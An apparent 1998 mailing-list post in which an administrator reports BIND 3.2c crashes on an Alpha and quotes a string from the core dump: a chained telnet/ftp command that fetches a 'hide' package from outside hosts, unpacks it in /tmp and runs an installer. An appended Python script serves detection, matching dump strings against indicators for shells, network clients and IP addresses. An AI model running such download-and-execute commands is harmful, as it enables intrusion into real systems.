Further to the BIND crashes reported recently ours went down again at
2300GMT Sunday and 0630 Monday morning. On using strings (we don't have a
licence for dbx non-kernel) on the relevant core dump we found the
following:
etc
im<29>May 17 23:50:04 named[7292]: Ready to answer queries.
Ready to answer queries.
;ech
61234^1
/bin/sh
telnet 194.100.53.150 666;cd /tmp;(echo open 128.2.189.110;echo ftp;echo
tnt_at_;echo get lib/hide hide;echo quit) | ftp;tar -zxf hi
de;cd ins;./ins;exit
smithbrewer
etc
This looks suspicious to me. What is such a string doing in the BIND
dump? Is it somebody trying to break in to a system using us as a
piggyback? We have nothing to do with either of these addresses. And is
this anything to do with the crash? We are still using 3.2c on an Alpha
1000.
Incidentally after the previous crash we set a cron job going to look for
BIND presence and restart if not found. This stopped me being called out
in the middle of Sunday night!!
Stuart McKenzie
Received on Mon May 18 1998 - 12:25:16 NZST
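
An added example, not part of the original message: a small triage script that does what strings did above and then flags any recovered string that combines several shell-command indicators, which is what made the telnet/ftp line stand out in a name server's core dump. The indicator patterns, the threshold and the sample bytes (with documentation-range addresses) are constructed for illustration.

```python
import re
import sys

MIN_LEN = 4  # shortest printable run to report, as strings(1) does by default
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e\t]{%d,}" % MIN_LEN)

# Assumed indicator set: things a DNS daemon has no reason to hold in memory.
INDICATORS = {
    "shell path": re.compile(r"/bin/(?:sh|csh|ksh|bash)\b"),
    "command chain": re.compile(r";\s*(?:cd|echo|exit|tar|rm|chmod)\b"),
    "network client": re.compile(r"\b(?:telnet|ftp|rsh|tftp)\b"),
    "ipv4 address": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "temp dir": re.compile(r"/tmp\b"),
}

def extract_strings(data):
    """Return every printable ASCII run of at least MIN_LEN bytes."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(data)]

def triage(data, threshold=2):
    """Return (string, matched labels) for strings hitting >= threshold indicators."""
    hits = []
    for s in extract_strings(data):
        labels = sorted(name for name, rx in INDICATORS.items() if rx.search(s))
        if len(labels) >= threshold:
            hits.append((s, labels))
    return hits

# Constructed sample standing in for a core file: binary noise, a normal
# log line, and a chained shell command of the kind quoted in the message.
SAMPLE_CORE = (
    b"\x00\x7fELF\x01\x00named[7292]: Ready to answer queries.\x00\x00"
    b"\x90\x90\x90/bin/sh\x00"
    b"telnet 192.0.2.10 666;cd /tmp;(echo open 198.51.100.20;echo quit) | ftp;exit\x00"
    b"\xff\xfeserial 1998051701\x00"
)

if __name__ == "__main__":
    # Pass a core file path to scan it; with no argument the sample is used.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = SAMPLE_CORE
    for text, labels in triage(data):
        print(", ".join(labels) + ": " + text)
```

A threshold of 2 keeps a lone "/bin/sh" (which libc itself contains) from being reported while still catching a full command line.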